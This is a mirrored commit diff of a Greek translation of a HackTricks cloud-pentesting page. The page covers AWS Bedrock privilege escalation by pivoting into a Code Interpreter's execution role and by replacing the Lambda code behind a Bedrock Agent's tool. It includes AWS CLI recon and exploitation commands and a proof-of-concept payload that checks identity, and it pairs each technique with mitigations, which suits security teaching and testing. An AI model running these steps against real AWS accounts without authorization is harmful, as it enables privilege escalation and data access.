gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-04-28 12:03:08 -07:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/pentesting-cloud/aws-security/aws-privilege-escalat

Browse Source
This commit is contained in:
Translator
2026-04-21 08:21:09 +00:00
parent fa35730983
commit fa8a00a626
1 changed files with 93 additions and 24 deletions
Download Patch File Download Diff File Expand all files Collapse all files

117
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
View File

@@ -6,32 +6,32 @@
### `bedrock-agentcore:StartCodeInterpreterSession` + `bedrock-agentcore:InvokeCodeInterpreter` - Code Interpreter Execution-Role Pivot
AgentCore Code Interpreter είναι ένα διαχειριζόμενο περιβάλλον εκτέλεσης. **Custom Code Interpreters** μπορούν να διαμορφωθούν με ένα **`executionRoleArn`** που «παρέχει δικαιώματα για τον code interpreter να έχει πρόσβαση σε AWS services».
Το AgentCore Code Interpreter είναι ένα managed execution environment. **Custom Code Interpreters** μπορούν να ρυθμιστούν με ένα **`executionRoleArn`** που «παρέχει permissions για το code interpreter να έχει πρόσβαση σε AWS services».
Εάν ένας **lower-privileged IAM principal** μπορεί να **start + invoke** μια Code Interpreter session που είναι διαμορφωμένη με ένα **more privileged execution role**, ο καλών μπορεί ουσιαστικά να **pivot into the execution roles permissions** (lateral movement / privilege escalation ανάλογα με το role scope).
Αν ένα **lower-privileged IAM principal** μπορεί να **start + invoke** μια Code Interpreter session που έχει ρυθμιστεί με ένα **more privileged execution role**, ο caller μπορεί ουσιαστικά να **pivot into the execution roles permissions** (lateral movement / privilege escalation ανάλογα με το εύρος του role).
> [!NOTE]
> Αυτό είναι τυπικά ένα **misconfiguration / excessive permissions** θέμα (παροχή ευρέων δικαιωμάτων στο interpreter execution role και/ή παροχή ευρείας invoke πρόσβασης).
> AWS προειδοποιεί ρητά να αποφευχθεί το privilege escalation εξασφαλίζοντας ότι τα execution roles έχουν **equal or fewer** privileges από τις ταυτότητες που επιτρέπεται να invoke.
> Αυτό είναι συνήθως ένα θέμα **misconfiguration / excessive permissions** (παροχή ευρέων permissions στο interpreter execution role και/ή παροχή broad invoke access).
> Το AWS προειδοποιεί ρητά να αποφεύγεται το privilege escalation, διασφαλίζοντας ότι τα execution roles έχουν **ίσα ή λιγότερα** privileges από τα identities που επιτρέπεται να κάνουν invoke.
#### Preconditions (common misconfiguration)
- Υπάρχει ένας **custom code interpreter** με ένα over-privileged **execution role** (π.χ.: πρόσβαση σε sensitive S3/Secrets/SSM ή IAM-admin-like capabilities).
- Ένας χρήστης (developer/auditor/CI identity) έχει δικαιώματα να:
- Υπάρχει ένα **custom code interpreter** με **execution role** που έχει υπερβολικά πολλά privileges (π.χ. access σε sensitive S3/Secrets/SSM ή IAM-admin-like capabilities).
- Ένας user (developer/auditor/CI identity) έχει permissions για:
- start sessions: `bedrock-agentcore:StartCodeInterpreterSession`
- invoke tools: `bedrock-agentcore:InvokeCodeInterpreter`
- (Προαιρετικό) Ο χρήστης μπορεί επίσης να δημιουργήσει interpreters: `bedrock-agentcore:CreateCodeInterpreter` (του επιτρέπει να δημιουργήσει έναν νέο interpreter διαμορφωμένο με ένα execution role, ανάλογα με τα org guardrails).
- (Optional) Ο user μπορεί επίσης να δημιουργεί interpreters: `bedrock-agentcore:CreateCodeInterpreter` (του επιτρέπει να δημιουργήσει έναν νέο interpreter με configured execution role, ανάλογα με τα org guardrails).
#### Recon (identify custom interpreters and execution role usage)
Καταγράψτε interpreters (control-plane) και ελέγξτε τη διαμόρφωσή τους:
List interpreters (control-plane) and inspect their configuration:
```bash
aws bedrock-agentcore-control list-code-interpreters
aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>
````
> Η εντολή create-code-interpreter υποστηρίζει `--execution-role-arn` το οποίο ορίζει ποια AWS δικαιώματα θα έχει ο interpreter.
```
> Η εντολή create-code-interpreter υποστηρίζει `--execution-role-arn` το οποίο ορίζει ποια AWS permissions θα έχει ο interpreter.
#### Βήμα 1 - Ξεκινήστε μια συνεδρία (αυτό επιστρέφει ένα `sessionId`, όχι ένα interactive shell)
#### Βήμα 1 - Ξεκινήστε μια session (αυτό επιστρέφει ένα `sessionId`, όχι ένα interactive shell)
```bash
SESSION_ID=$(
aws bedrock-agentcore start-code-interpreter-session \
@@ -43,11 +43,11 @@ aws bedrock-agentcore start-code-interpreter-session \
echo "SessionId: $SESSION_ID"
```
#### Βήμα 2 - Εκτέλεση κώδικα (Boto3 ή signed HTTPS)
#### Βήμα 2 - Invoke code execution (Boto3 or signed HTTPS)
Δεν υπάρχει **διαδραστικό python shell** από `start-code-interpreter-session`. Η εκτέλεση γίνεται μέσω του **InvokeCodeInterpreter**.
Δεν υπάρχει **interactive python shell** από το `start-code-interpreter-session`. Η εκτέλεση γίνεται μέσω **InvokeCodeInterpreter**.
**Επιλογή A - Παράδειγμα Boto3 (εκτέλεση Python + επαλήθευση ταυτότητας):**
**Option A - Boto3 example (execute Python + verify identity):**
```python
import boto3
@@ -68,9 +68,9 @@ arguments={
for event in resp.get("stream", []):
print(event)
```
Εάν ο interpreter είναι ρυθμισμένος με execution role, η έξοδος του `sts:GetCallerIdentity()` θα πρέπει να αντικατοπτρίζει την ταυτότητα αυτού του role (όχι του low-priv caller), επιδεικνύοντας το pivot.
Εάν το interpreter έχει ρυθμιστεί με execution role, το output του `sts:GetCallerIdentity()` θα πρέπει να αντικατοπτρίζει την ταυτότητα αυτού του role (όχι του low-priv caller), αποδεικνύοντας το pivot.
**Επιλογή B - Signed HTTPS call (awscurl):**
**Option B - Signed HTTPS call (awscurl):**
```bash
awscurl -X POST \
"https://bedrock-agentcore.<Region>.amazonaws.com/code-interpreters/<CODE_INTERPRETER_IDENTIFIER>/tools/invoke" \
@@ -89,16 +89,84 @@ awscurl -X POST \
```
#### Επιπτώσεις
* **Lateral movement** σε όποια πρόσβαση AWS έχει ο ρόλος εκτέλεσης του interpreter.
* **Privilege escalation** εάν ο ρόλος εκτέλεσης του interpreter έχει περισσότερα προνόμια από τον καλούντα.
* Δυσκολότερη ανίχνευση εάν τα CloudTrail data events για interpreter invocations δεν είναι ενεργοποιημένα (οι invocations ενδέχεται να μην καταγράφονται από προεπιλογή, ανάλογα με τη διαμόρφωση).
* **Lateral movement** μέσα σε οποιαδήποτε AWS πρόσβαση έχει το interpreter execution role.
* **Privilege escalation** αν το interpreter execution role είναι πιο privileged από τον caller.
* Πιο δύσκολος εντοπισμός αν τα CloudTrail data events για interpreter invocations δεν είναι ενεργοποιημένα (οι invocations μπορεί να μην καταγράφονται από προεπιλογή, ανάλογα με τη διαμόρφωση).
#### Μέτρα μετριασμού / Σκληροποίηση
#### Mitigations / Hardening
* **Least privilege** στο interpreter `executionRoleArn` (χειριστείτε το όπως Lambda execution roles / CI roles).
* **Περιορίστε ποιος μπορεί να invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) και ποιος μπορεί να ξεκινήσει sessions.
* Χρησιμοποιήστε **SCPs** για να αρνηθείτε InvokeCodeInterpreter εκτός από εγκεκριμένους agent runtime roles (μπορεί να είναι απαραίτητη η επιβολή σε επίπεδο org).
* Ενεργοποιήστε τα κατάλληλα **CloudTrail data events** για AgentCore όπου εφαρμόζεται· ειδοποιήστε για απροσδόκητες invocations και δημιουργία sessions.
* **Least privilege** στο interpreter `executionRoleArn` (χειριστείτε το όπως τα Lambda execution roles / CI roles).
* **Restrict who can invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) και ποιος μπορεί να ξεκινά sessions.
* Χρησιμοποιήστε **SCPs** για να deny το InvokeCodeInterpreter εκτός από approved agent runtime roles (η επιβολή σε επίπεδο org μπορεί να είναι απαραίτητη).
* Ενεργοποιήστε τα κατάλληλα **CloudTrail data events** για AgentCore όπου ισχύει· κάντε alert σε απρόσμενες invocations και δημιουργία sessions.
## Amazon Bedrock Agents
### `lambda:UpdateFunctionCode`, `bedrock:InvokeAgent` - Agent Tool Hijacking via Lambda
Τα Bedrock Agents μπορούν να χρησιμοποιούν **Lambda-backed action groups** ως tools (external execution). Αν ένας principal μπορεί να **τροποποιήσει τον κώδικα μιας Lambda function που χρησιμοποιείται από ένα agent**, και στη συνέχεια να **invoke τον agent**, μπορεί να εκτελέσει attacker-controlled code υπό το **Lambda execution role**.
> [!NOTE]
> Αυτό είναι **cross-service trust abuse** (Bedrock → Lambda), όχι vulnerability. Ο attacker μπορεί να μην μπορεί να invoke τη Lambda απευθείας, αλλά μπορεί να την ενεργοποιήσει μέσω του agent.
#### Preconditions (common misconfiguration)
- Υπάρχει ένα Bedrock Agent με ένα **action group backed by a Lambda function**
- Ο attacker έχει:
- `lambda:UpdateFunctionCode`
- `bedrock:InvokeAgent`
- Το Lambda execution role έχει ευρύτερα permissions από τον attacker
- Ο attacker μπορεί να εντοπίσει τη Lambda που χρησιμοποιεί ο agent
#### Recon
Enumerate agent action groups:
```bash
aws bedrock-agent list-agents
aws bedrock-agent get-agent --agent-id <AGENT_ID>
aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID> --agent-version DRAFT
```
Επιθεώρηση Lambda:
```bash
aws lambda get-function --function-name <FUNCTION_NAME>
```
#### Εκμετάλλευση
Αντικατάσταση κώδικα Lambda:
```bash
zip payload.zip lambda_function.py
aws lambda update-function-code \
--function-name <FUNCTION_NAME> \
--zip-file fileb://payload.zip
```
Παράδειγμα payload:
```python
import boto3
def lambda_handler(event, context):
return boto3.client("sts").get_caller_identity()
```
Trigger μέσω agent:
```bash
aws bedrock-agent-runtime invoke-agent \
--agent-id <AGENT_ID> \
--agent-alias-id <ALIAS_ID> \
--session-id test \
--input-text "trigger tool"
```
#### Επιπτώσεις
* **Privilege escalation** στο Lambda execution role
* **Data exfiltration** από AWS services
* **Cross-service abuse** μέσω trusted agent execution
#### Μετριασμοί
* **Restrict** `lambda:UpdateFunctionCode`
* Χρησιμοποιήστε **least-privilege** Lambda roles
* **Monitor** αλλαγές στον Lambda code
* **Audit** το Bedrock agent tool usage
## References
@@ -108,6 +176,7 @@ awscurl -X POST \
- [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html)
- [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html)
- [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html)
- [SoftwareSecured: AWS Privilege Escalation Techniques (Bedrock agent tool hijacking)](https://www.softwaresecured.com/post/aws-privilege-escalation-iam-risks-service-based-attacks-and-new-ai-driven-bedrock-agentcore-vectors)
{{#include ../../../../banners/hacktricks-training.md}}